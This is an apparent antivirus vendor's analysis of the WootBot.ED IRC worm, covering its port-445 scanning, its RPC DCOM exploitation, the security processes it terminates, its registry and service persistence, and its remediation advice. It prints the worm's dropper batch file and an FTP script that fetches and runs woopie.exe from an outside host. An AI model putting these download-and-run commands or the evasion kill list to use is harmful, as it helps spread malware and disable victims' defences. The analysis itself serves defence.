Virus

W32/WootBot.ED!worm

Analysis

This virus is 32-bit with a packed file size of 86,466 bytes. It contains instructions to spread to other systems using known RPC exploits, and also connect with an IRC server to await instructions from a malicious user. The virus can terminate utility programs and other important services.


Service Termination Routine
When the virus activates, it will use PSAPI.DLL to identify and terminate applications or services based on a master list stored in the virus. The list also includes names of other known threats -
Common threat filenames
video.exe
norton123.exe
svchosting.exe
0x1fe.exe
inst.EXEexplore32.exe
winagent.exe
lssas.exe
lsass2.exe
rxb1ot.exe
serasa.exe
serasa.exe.a
novarg_upx.zip
photo.zip
opr0371I.js
change.exe
pic33.scr
winset32.exe
wuarclt.exe
Crypto3.jpg
Tcpview1.exe
Tcpview.exe
taskmgr1.exe
taskmg.exe
cmd2.exe
cmd1.exe
ad-watch.exe
expore.exe
CSSSS.exe
CSRSR.exe
CSRSRS.exe
smsss.exe
sub7.exe
jpg.exebot.exe
fbi.exe
wupdate.exe
phatbot.exe
agobot.exe
iexplorer.exe
windowsupdate.exe
gov.exe
bircd.exe
rbot.exe
spybot.exe
rxbot.exe
forbot.exe
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe

Utility applications or services
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
wircd.exe
cmd.exe
regedit.exe
msconfig.exe
taskmgr.exe
zapro.EXE
vsmon.EXE
vshwin32.EXE
vbcmserv.EXE
sbserv.EXE
rtvscan.EXE
rapapp.EXE
pcscan.EXE
pccwin97.EXE
pccntmon.EXE
pavproxy.EXE
nvsvc32.EXE
ntrtscan.EXE
npscheck.EXE
notstart.EXE
lockdown2000.EXE
iamserv.EXE
iamapp.EXE
gbpoll.EXE
gbmenu.EXE
fsmb32.EXE
fsma32.EXE
fsm32.EXE
fsgk32.EXE
fsav32.EXE
fsaa.EXE
fnrb32.EXE
fih32.EXE
fch32.EXE
fameh32.EXE
f-stopw.EXE
defscangui.EXE
defalert.EXE
cpd.EXE
cleaner3.EXE
cleaner.EXE
ccPxySvc.EXE
ccEvtMgr.EXE
ccApp.EXE
blackd.EXE
avpm.EXE
avkwctl9.EXE
avkservice.EXE
avkpop.EXE
apvxdwin.EXE
agentw.EXE
ZONALM2601.EXE
CZAUINST.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WrCtrl.EXE
WrAdmin.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE

Internet Connection Attempts
The virus then begins scanning random IP addresses using TCP port 445 to identify potential targets. The virus will send a SYN packet to randomly selected IP addresses from the subnet the system is on. For instance, if the infected system's IP address is 10.10.18.185, the virus targets systems on 10.10.undefinedrandomundefined.undefinedrandomundefined such as these examples -

10.10.1.240
10.10.25.13
10.10.69.53
10.10.17.119

and so on. If a system responds with an acknowledgement [ACK], it becomes a target for the virus. The virus will try to gain access by implementing an RPC DCOM exploit. If access is gained, the virus creates a batch script file named "c.bat" with these instructions -

@echo off
ftp -n -v -s:.pif
woopie.exe
del .pif
del /F c.bat
exit /y

The instructions above do the following -

  • start an instance of the program FTP [file transfer protocol]
  • suppress displaying server responses, and prevent auto login when connecting
  • use a script file named ".pif" to handle logon info
  • run the file "woopie.exe"
  • delete the ftp script file ".pif", and forcibly delete the current batch script "c.bat"
  • exit the command shell

The ftp script file ".pif" contains these instructions -

open dra.chatcenter.nl 21
user ******* ******
binary
GET woopie.exe
bye

In the above script, the user name and password info has been edited for obvious reasons. The file "woopie.exe" is a copy of the virus. Fortigate would block any transfer if scanning of the FTP service is enabled.


Loading at Windows startup
If virus is run, it will copy itself to the hard drive into the System32 folder as "Nvsc32.exe" and modify the registry in numerous places to maximize the chance of the virus loading at each user logon instance -

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"NvCplScan" = nvsc32.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
"NvCplScan" = nvsc32.exe


Additionally, the virus creates a service on Windows NT/2000/XP systems and adjusts the registry with these changes -


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\
"NextInstance" = 01, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\
"Class" = LegacyDriver
"ClassGUID" = {8ECC055D-047F-11D1-A537-0000F8753ED1}
"ConfigFlags" = 00, 00, 00, 00
"DeviceDesc" = NvCplScan
"Legacy" = 01, 00, 00, 00
"Service" = NvCplScan

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_NVCPLSCAN\0000\Control\
"*NewlyCreated*" = 00, 00, 00, 00
"ActiveService" = NvCplScan

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\
"DeleteFlag" = 01, 00, 00, 00
"DisplayName" = NvCplScan
"ErrorControl" = 01, 00, 00, 00
"FailureActions" = (hex values)
"ImagePath" = "C:\WINNT\System32\nvsc32.exe" -netsvcs
"ObjectName" = LocalSystem
"Start" = 04, 00, 00, 00
"Type" = 20, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Enum\
"0" = Root\LEGACY_NVCPLSCAN\0000
"Count" = 01, 00, 00, 00
"NextInstance" = 01, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NvCplScan\Security\
"Security" = (hex values)


IRC Server Connection
The virus may bind to a TCP port and then attempts to connect with the IRC server 'members.home.nl'. When connected, the virus will await instructions from a malicious user.

The commands could carry out instructions such as send floods (PING, HTTP, UDP, SYN), scan for exploits (DCOM, NetBIOS) and other instructions. The virus could also function as an FTP or HTTP server and act as a file server or staging server.


Miscellaneous
The virus contains the string 'Woot' in its body.

Recommended Action

  • Block Internal to External (INT -> EXT) and External to Internal (EXT -> INT) traffic on port TCP ports 135, 139, 445, and 6667
  • Ensure the latest Microsoft Security patches are applied to all systems with regard to patching RPC vulnerabilities and other vulnerabilities associated with this virus